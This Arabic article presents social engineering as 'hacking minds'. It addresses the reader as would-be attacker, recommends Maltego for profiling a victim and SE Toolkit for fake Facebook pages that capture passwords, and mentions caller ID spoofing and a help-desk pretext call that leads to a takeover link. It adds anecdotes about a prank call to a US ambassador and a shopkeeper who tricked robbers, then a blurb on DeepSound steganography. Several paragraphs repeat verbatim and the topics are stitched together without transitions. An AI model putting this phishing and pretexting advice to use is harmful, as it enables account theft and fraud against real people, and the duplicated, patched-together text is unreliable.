صناعة صفحة فيسبوك تتضمن صورة مثلا و عليها تعليقات وهمية من إستخراج رابط لها، يمكنك إرسالها للضحية للإطلاع عليها، اي شيئ سيدخله في تلك الصفحة مثل تعليق او ربما كلمة سر و غيرها ستتوصل بها، نعم يستخدم البعض هذه الطريقة لإختراق حسابات فسيبوك، يبقى الفرق هنا في قدراتك في إقناعه للولوج للصفحة و كتابة كلمة السر حقا. يمكن إستخدام أدوات حية او فيزيائية كذلك في عمليات الهندسة الإجتماعية، مثل إستخدام كاميرات المراقبة من أجل تسجيل مقطع معين و تأويله حسب ما تريده أنت، اي ان تخبره ان هذا المقطع تم في الفلان الفلاني و هكذا كوسيلة لإقناع الضحية، أو إستخدام بعض برمجيات الهاتف مثل Caller ID Spoofing مثل الذي استخدمته المخترقة السابقة من أجل إجراء إتصال برقم هاتف الضحية مثلا او اي رقم هاتف آخر .
إختراق شركة كاملة بنقرة زر واحدة ... و بعض الهندسة الإجتماعية كذلك !
" دايفيد " هو مختص في مجال الإختراق، ليس إختراق الحواسيب فقط، بل إختراق العقول أيضا، تريد شركة X إستخدام " دايفيد " من أجل الولوج و الحصول على بعض البيانات الخاصة بالعملاء في الشركة لأغراض محددة. يُمسك دايفيد حاسوبك ثم يستخدم برمجية معينة من أجل الحصول على رقم هاتف احد العملاء في الشركة ثم يقوم بإستخدام Caller ID Spoofing هو الآخر من أجل الإتصال برقم يشبه احد العاملين في الشركة، فيتصل بمكتب التقنية او الـ IT و يُخبرهم ان حاسوبه لا يستطيع الولوج إلى المواقع الضرورية بالنسبة له فأن استطاع المساعد تقديم الإفادة من أجله، يدرف " دايفيد " بعض العبارات في إتصاله مثل " اسف، اعتذر اعلم انني اخرق في مجال الكمبيوتر فرجاءََ ان استطعت مساعدتي "، يخبره المساعد ان يمده برابط الموقع الذي يريد الولوج إليه، يوفره له دايفيد ثم يلج إليه المساعد، ينقر بعدها على زر وسط الموقع، زر او رابط قد برمجه " دايفيد " مسبقا من أجل التحكم الكامل في حاسوب كل من ينقر عليه، و بذلك فقد إستطاع " دايفيد " الحصول على صلاحيات الولوج لحاسوب المساعد، الذي بدوره يملك صلاحيات الولوج لخوادم الشركة و كل متعلقاتها. إختراق للعقل + تهكير للحواسيب = إختراقات كبرى !
لا تحتاج الى تعلم التكويد او البرمجة او لغة البايثون لتحترف او على الأقل لتفهم و تمارس الهندسة الإجتماعية، فالهندسة الإجتماعية تلعب على شطرين رئيسين : معرفة كم جيد من المعلومات حول الضحية التي تنوي إختراقها، ثم معرفة كيفية التلاعب بها و تنظيمها بطريقة غير مثيرة للريبة. الهندسة الإجتماعية ببساطة هي جعل أي شخص يقوم بأي شيئ تريده او يقوم بتوفير أي نوع من المعلومات التي تريدها دون الحاجة بإستخدام فقط بعض التقنيات التكنولوجية مثل الحاسوب او الإنترنت ثم تنظيم أفكارك و قراءة ردة فعل الضحية و التعامل معها بطريقة إحترافية الى حين كسب ثقته الكاملة و توفير كل المعلومات التي تحتاجه من معلومات او بيانات مثل معلومات الولوج لحسابات شخصية او غيرها من البيانات.تستخدم الهندسة الإجتماعية بشكل كبير رقميا، إذ يجلس خلف الشاشة شخص معين قد جهز نفسه جيدا من أجلك، و لا يمكننا ان نقول ان استخدامها ضعيف في العالم الحي، بل شائع كذلك، إذ يستطيع ممارس الهندسة الإجتماعية أخذ اي نوع من البيانات بطيب خاطر للضحية.
الأدوات المستخدمة في الهندسة الإجتماعية :
سأذكر هنا ان الأداة الأساسية في عملية الهندسة الإجتماعية بعد القدرات العقلية على التلاعب بالطبع هي أداة Maltego، وفرنا شرحا وافيا لأداة Maltego في أكثر من مناسبة، منها مقالنا حول أفضل ادوات إختراق للويندوز، او أقوى ادوات نظام Kali Linux، تسمح لك أداة Maltego بتجميع كل أنواع المعلومات و البيانات حول ضحية معينة، ثم تقوم بالربط بين كل هذه المعلومات من أجل إستخراج بيانات محددة، فمن خلال تجميع العديد من المعلومات حول الضحية، و إن اردت ممارسة الهندسة الإجتماعية توجب عليك فعل ذلك بالتأكيد، ثم تنظيم هذه المعلومات حسب نظام معين، حتى ان الأداة قد توفر لك بعض الإقتراحات مثلا لكلمات سر من خلال تلك المعلومات قد يستخدمها الضحية في احد حساباته، او إستخراج معطيات أخرى إنطلاقا من المعطيات الموجودة. من Maltego سننتقل مباشرة لأداة SE Toolkit الموجودة كذلك في العديد من أنظمة الإختراق المعروفة، تسمح لك أداة SE Toolkit بصناعة العديد من الصفحات و الأرقام و غيرها من الأدوات الوهمية، فمثلا تستطيع من خلالها صناعة صفحة فيسبوك تتضمن صورة مثلا و عليها تعليقات وهمية من إستخراج رابط لها، يمكنك إرسالها للضحية للإطلاع عليها، اي شيئ سيدخله في تلك الصفحة مثل تعليق او ربما كلمة سر و غيرها ستتوصل بها، نعم يستخدم البعض هذه الطريقة لإختراق حسابات فسيبوك، يبقى الفرق هنا في قدراتك في إقناعه للولوج للصفحة و كتابة كلمة السر حقا. يمكن إستخدام أدوات حية او فيزيائية كذلك في عمليات الهندسة الإجتماعية، مثل إستخدام كاميرات المراقبة من أجل تسجيل مقطع معين و تأويله حسب ما تريده أنت، اي ان تخبره ان هذا المقطع تم في الفلان الفلاني و هكذا كوسيلة لإقناع الضحية، أو إستخدام بعض برمجيات الهاتف مثل Caller ID Spoofing مثل الذي استخدمته المخترقة السابقة من أجل إجراء إتصال برقم هاتف الضحية مثلا او اي رقم هاتف آخر .
إختراق شركة كاملة بنقرة زر واحدة ... و بعض الهندسة الإجتماعية كذلك !
" دايفيد " هو مختص في مجال الإختراق، ليس إختراق الحواسيب فقط، بل إختراق العقول أيضا، تريد شركة X إستخدام " دايفيد " من أجل الولوج و الحصول على بعض البيانات الخاصة بالعملاء في الشركة لأغراض محددة. يُمسك دايفيد حاسوبك ثم يستخدم برمجية معينة من أجل الحصول على رقم هاتف احد العملاء في الشركة ثم يقوم بإستخدام Caller ID Spoofing هو الآخر من أجل الإتصال برقم يشبه احد العاملين في الشركة، فيتصل بمكتب التقنية او الـ IT و يُخبرهم ان حاسوبه لا يستطيع الولوج إلى المواقع الضرورية بالنسبة له فأن استطاع المساعد تقديم الإفادة من أجله، يدرف " دايفيد " بعض العبارات في إتصاله مثل " اسف، اعتذر اعلم انني اخرق في مجال الكمبيوتر فرجاءََ ان استطعت مساعدتي "، يخبره المساعد ان يمده برابط الموقع الذي يريد الولوج إليه، يوفره له دايفيد ثم يلج إليه المساعد، ينقر بعدها على زر وسط الموقع، زر او رابط قد برمجه " دايفيد " مسبقا من أجل التحكم الكامل في حاسوب كل من ينقر عليه، و بذلك فقد إستطاع " دايفيد " الحصول على صلاحيات الولوج لحاسوب المساعد، الذي بدوره يملك صلاحيات الولوج لخوادم الشركة و كل متعلقاتها. إختراق للعقل + تهكير للحواسيب = إختراقات كبرى !
يمكنك ان تلاحظ ان أهم شيئ في الهندسة الإجتماعية هذ الذكاء الإجتماعي، إذ توجب عليك أن تكون إجتماعيا و قادرا على التحدث بأي نمطية كيفما كانت، تستطيع إتخاذ اي شخصية و أي وضعية، فإن اخبروك ان تكون مرتبكا في حديثك عليك ان تكون كذلك، إن توجي عليك ان تكون صارما في حديثك و شخصيتك عليك ان تكون كذلك، من أجل إقناع أي شخص تتحدث معه بإخضاعه لأي شيئ تريد و يوفر لك أي شيئ تريده كذلك.
- إختراق عقل عالي المستوى ... حين تستطيع الولوج لسفراء الدول من خلال الهاتف فقط :
هذا الإختراق غير طبيعي إطلاقا، قد يسميه البعض مجرد " مقلب " لكننا نعتقد انه حقا حقا إختراق للعقل البشري بإستخدام تقنيات الـ Social Engineering . قام كل من Vovan و Lexus و هما مؤديا مقالب روسيين او Pranksters بالقيام بواحدة من أكثر المقالب إحراجا، إذ قاما بالإتصال بسفيرة الولايات المتحدة الأمريكية " نيكي هايلي " و التي تشغل منصبا كذلك في الأمم المتحدة ( و إن كنت متابعا للأخبار فقد إستقالت هذا الشهر من هذا المنصب أيضا )، و قد إدعى احدهما انه الوزير البولندي، و أخذ في الحديث مع " نيكي " لما يقارب الـ 20 دقيقة بعد ان حصل على رقم هاتفها و إتصل بها بشكل مخادع. حتى الآن كل شيئ لا بأس به و لا خطورة في الأمر، لكن الأسوأ انه اثناء الحديث إستطاع ان يستخرج بعض المعلومات السرية حول بولندا كذلك و دعمهم لمشروع ضد روسيا لصالح بعض الدول المجاورة أيضا و توضيح معارضتها لروسيا و العديد من الأكاذيب الديبلوماسية التي تظهر بها علنا و كشفت حقيقتها سرا في هذا الإتصال المخادع. كان و لازال هذا واحدا من أفضل مقالب خداع العقل البشري و الهندسة الإجتماعية التي يمكنك ان تشاهدها يوما !
- إختراق عقل عالي المستوى ... حين تستطيع الولوج لسفراء الدول من خلال الهاتف فقط :
هذا الإختراق غير طبيعي إطلاقا، قد يسميه البعض مجرد " مقلب " لكننا نعتقد انه حقا حقا إختراق للعقل البشري بإستخدام تقنيات الـ Social Engineering . قام كل من Vovan و Lexus و هما مؤديا مقالب روسيين او Pranksters بالقيام بواحدة من أكثر المقالب إحراجا، إذ قاما بالإتصال بسفيرة الولايات المتحدة الأمريكية " نيكي هايلي " و التي تشغل منصبا كذلك في الأمم المتحدة ( و إن كنت متابعا للأخبار فقد إستقالت هذا الشهر من هذا المنصب أيضا )، و قد إدعى احدهما انه الوزير البولندي، و أخذ في الحديث مع " نيكي " لما يقارب الـ 20 دقيقة بعد ان حصل على رقم هاتفها و إتصل بها بشكل مخادع. حتى الآن كل شيئ لا بأس به و لا خطورة في الأمر، لكن الأسوأ انه اثناء الحديث إستطاع ان يستخرج بعض المعلومات السرية حول بولندا كذلك و دعمهم لمشروع ضد روسيا لصالح بعض الدول المجاورة أيضا و توضيح معارضتها لروسيا و العديد من الأكاذيب الديبلوماسية التي تظهر بها علنا و كشفت حقيقتها سرا في هذا الإتصال المخادع. كان و لازال هذا واحدا من أفضل مقالب خداع العقل البشري و الهندسة الإجتماعية التي يمكنك ان تشاهدها يوما !
إختراق للعقل البشري وجها لوجه ... حالة أقرب :
قد يعتبر البعض هذه الحالة هي حالة إقناع او تسويق ذكي، لكننا نراها حالة إختراق للعقل البشري و حالة هندسة إجتماعية تلقائية و فذة و حية. " ديدييه " و هو صاحب محل في بلجيكا يفتح ليل نهار بدون توقف، جائه في احد الأيام 6 أشخاص مسلحين يريدون سرقة محله التجاري على الساعة 3 فجرا، أخبرهم صاحب المحل انهم يركتبون خطأ كبيرا، قائلا ان المحل الآن على الساعة الـ 3 فجرا لا يملك الكثير من الزبائن، اي انك ان قمت بسرقتي الآن لن تحصل سوى على 1000 يورو، عد على الساعة السادسة و النصف، ستجد ان الخزينة ممتلئة قليلا و حينها تستطيع اخذ الكثير من الأموال في عملية سطو ناجحة. وافق الأشخاص على ذلك و أخبروه انهم سيعودون على الساعة الـ 6 و النصف لسرقة المحل. قد تعتقد أن الأمر حتى الآن مضحك و غريب، لكن إنتظر سيزداد غرابة، فقد عاد اللصوص على الساعة الـ 5 و النصف ليقومو بعملية السطو على المحل، أخبرهم صاحب المحل : يا أصدقاء، أشترو ساعة من فضلكم، اخبرتكم الساعة الـ 6 و النصف و ليس الـ 5 و النصف، اخرجو الآن و عودو بعد ساعة. غادر اللصوص حقا ومعتذرين عن إلتباسهم في الوقت. إتصل بعدها صاحب المحل بالشرطة و شرح لهم الأمر، ليتخفو داخل المحل منتظرين اللصوص للعودة، اثناء عودتهم قامو بالقبض عليهم . قال صاحب المحل أنه إستخدم وسائل إقناع، لكنه حقا إستخدام وسائل هندسة إجتماعية، فقد إستطاع إستغلال إرتباك اللصوص و صاحب عقلهم و تقمص شخص مساعد لهم في عملية السطو و سيكون رفيقا جيدا لهم في عمليتهم، و إستطاع كسب ثقتهم ثم خداعهم في الأخير .
قد يعتبر البعض هذه الحالة هي حالة إقناع او تسويق ذكي، لكننا نراها حالة إختراق للعقل البشري و حالة هندسة إجتماعية تلقائية و فذة و حية. " ديدييه " و هو صاحب محل في بلجيكا يفتح ليل نهار بدون توقف، جائه في احد الأيام 6 أشخاص مسلحين يريدون سرقة محله التجاري على الساعة 3 فجرا، أخبرهم صاحب المحل انهم يركتبون خطأ كبيرا، قائلا ان المحل الآن على الساعة الـ 3 فجرا لا يملك الكثير من الزبائن، اي انك ان قمت بسرقتي الآن لن تحصل سوى على 1000 يورو، عد على الساعة السادسة و النصف، ستجد ان الخزينة ممتلئة قليلا و حينها تستطيع اخذ الكثير من الأموال في عملية سطو ناجحة. وافق الأشخاص على ذلك و أخبروه انهم سيعودون على الساعة الـ 6 و النصف لسرقة المحل. قد تعتقد أن الأمر حتى الآن مضحك و غريب، لكن إنتظر سيزداد غرابة، فقد عاد اللصوص على الساعة الـ 5 و النصف ليقومو بعملية السطو على المحل، أخبرهم صاحب المحل : يا أصدقاء، أشترو ساعة من فضلكم، اخبرتكم الساعة الـ 6 و النصف و ليس الـ 5 و النصف، اخرجو الآن و عودو بعد ساعة. غادر اللصوص حقا ومعتذرين عن إلتباسهم في الوقت. إتصل بعدها صاحب المحل بالشرطة و شرح لهم الأمر، ليتخفو داخل المحل منتظرين اللصوص للعودة، اثناء عودتهم قامو بالقبض عليهم . قال صاحب المحل أنه إستخدم وسائل إقناع، لكنه حقا إستخدام وسائل هندسة إجتماعية، فقد إستطاع إستغلال إرتباك اللصوص و صاحب عقلهم و تقمص شخص مساعد لهم في عملية السطو و سيكون رفيقا جيدا لهم في عمليتهم، و إستطاع كسب ثقتهم ثم خداعهم في الأخير .
DeepSound :
هي اداة توفر لك إمكانية حفظ الملفات و البيانات على شكل مقاطع موسيقية، فحتى في حالة التطفل عليك و على بياناتك، كل ما يستيطع المتطفل ايجاده هو مجموعة من المقاطع الموسيقية لا أكثر، لكن خلف تلك المقاطع، يوجد ملفات حساسة خاصة بك تم إخفائها بطريقة ذكية، لا تستطيع الإطلاع على الملفات القابعة خلف تلك المقاطع الا بإستخدام أداة DeepSound.
استخدم " إليوت " الأداة في الجزء الأول الحلقة الثامنة لإخفاء مجموعة من الملفات في قرص مرن، ثم وضع القرص المرن ضمن مجموعة من الأقراص الموسيقية الأخرى أيضا كنوع من أنواع التمويه.
الاداة تعمل على انظمه لينكس 😁❤️
هي اداة توفر لك إمكانية حفظ الملفات و البيانات على شكل مقاطع موسيقية، فحتى في حالة التطفل عليك و على بياناتك، كل ما يستيطع المتطفل ايجاده هو مجموعة من المقاطع الموسيقية لا أكثر، لكن خلف تلك المقاطع، يوجد ملفات حساسة خاصة بك تم إخفائها بطريقة ذكية، لا تستطيع الإطلاع على الملفات القابعة خلف تلك المقاطع الا بإستخدام أداة DeepSound.
استخدم " إليوت " الأداة في الجزء الأول الحلقة الثامنة لإخفاء مجموعة من الملفات في قرص مرن، ثم وضع القرص المرن ضمن مجموعة من الأقراص الموسيقية الأخرى أيضا كنوع من أنواع التمويه.
الاداة تعمل على انظمه لينكس 😁❤️